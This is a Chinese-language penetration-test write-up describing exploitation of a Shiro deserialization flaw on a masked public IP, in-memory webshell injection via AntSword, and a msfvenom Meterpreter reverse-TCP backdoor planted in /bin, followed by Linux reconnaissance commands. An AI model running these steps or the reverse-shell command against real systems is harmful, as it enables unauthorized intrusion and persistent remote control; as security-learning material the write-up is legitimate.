记一次实战 Shiro反序列化内网上线

Shiro反序列化内网上线

---

说明：
此贴仅分享用于各安全人员进行安全学习提供思路，或有合法授权的安全测试，请勿参考用于其他用途，如有，后果自负。
感谢各位大佬的关注

目标：152.xxx.xxx.xxx
目的：通过信息收集或其他方式寻找到了一枚shiro反序列化的漏洞，并进行了内网渗透测试工作
类型：Web反序列化漏洞

介绍：
Shiro 是 Java安全框架通过序列化，进行AES密钥做身份验证加密（cookie加密）通过shiro硬编码 比证密钥 获取目标利用链并进行上线操作

本文的起因是在一次渗透测试中，挖掘到了一个shiro反序列化 故进行了内网渗透尝试

特征：
在请求消息中 构造cookie
添加一个参数rememberMe=xxx,观察响应消息头中的Set-Cookie是否有rememberMe=deleteMe;如果有则说明使用了shiro框架

信息收集

---

这里我采用的是网络空间测绘引擎、目录信息收集、域名收集 等进行了资产整合利用

将搜集的信息 导出整合数据 备用

1. 利用检测工具 减少误判率

这里我用的是java开发的shiroScan 检测工具
*扫之前记得开代理 查询当前代理IP

在当前目录下开始对目标进行扫描 再次筛选存活并可利用的网站

将筛选结果导出保存

漏洞利用

---

1. 这边我利用shiro利用工具对目标进行”硬编码“ 密钥爆破操作

这里我用的是java开发的shiro利用工具
筛选目标时 发现目标存在Shiro反序列化漏洞 采用了硬编码

在工具内进行功能区的利用，在爆破完成后，对目标进行目录扫描。【记得开代理】
kali中 开个小代理

2.这边对目标进行目录收集

3.这边当即对 目标目录 进行内存马注入操作
拓展一下：
内存马 是无文件渗透测试的一种常用手段
webshell的变迁过程大致如下所述：
web服务器管理页面——> 大马——>小马拉大马——>一句话木马——>加密一句话木马——>加密内存马
因为传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到，故内存马使用越来越多

这边我使用 蚁剑 尝试连接成功

在蚁剑的命令行中执行 查询命令时 发现该目标是root用户 Linux系统 初步判断是Debian

目标上线

---

这里开始利用 metasploit 安全漏洞检测工具中的_msfvenom payload生成器 _使目标上线

msfvenom生成 Linux 后门程序，这里刚开始我是使用的cobalt strike 中生成的Java后门程序发现行不通 可能是因为目标JDK的版本 导致不兼容的原因，故利用metasploit的msfvenom生成后门程序 结合“蚁剑”上传后门程序 使目标成功进行执行上线操作

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=[lhost_ip] lport=22715 -f elf -o 123.elf


将生成的后门程序 上传至目标 并利用蚁剑的命令行执行此文件 记得改文件执行权限
chmod 777 123.elf;
chmod u+x 123.elf;
./123.elf 执行文件

后门程序“123.elf” 成功上传至目标/bin目录下

执行msfconsole 进入MSF命令接口 执行快速监听等待目标成功上线

利用meterpreter成功拿shell
它是攻击载荷能够获得目标系统的一个Meterpreter shell的链接

内网渗透 Linux信息收集

查询主机名

2>/dev/null,作用是丢弃错误信息
hostname 2>/dev/null

查询系统名称

cat /etc/issue

查询内核版本

查询系统和内核的所有相关信息
依次为内核名称，主机名，内核版本号，内核版本，硬件架构名称，处理器类型，硬件平台类型，操作系统名称
uname -a

查询CPU信息

cat /proc/cpuinfo

查询磁盘信息

查询文件系统磁盘的详细信息
包括磁盘名称，内存大小，已用空间，可用空间，挂载点
查看本地磁盘信息
df -lh
查看所有磁盘信息
df -ah

查询网络连接状态

访问网络连接状态及其相关信息的程序

这里可以看到在目标执行中的"123.elf"后门程序

点到为止 测试结束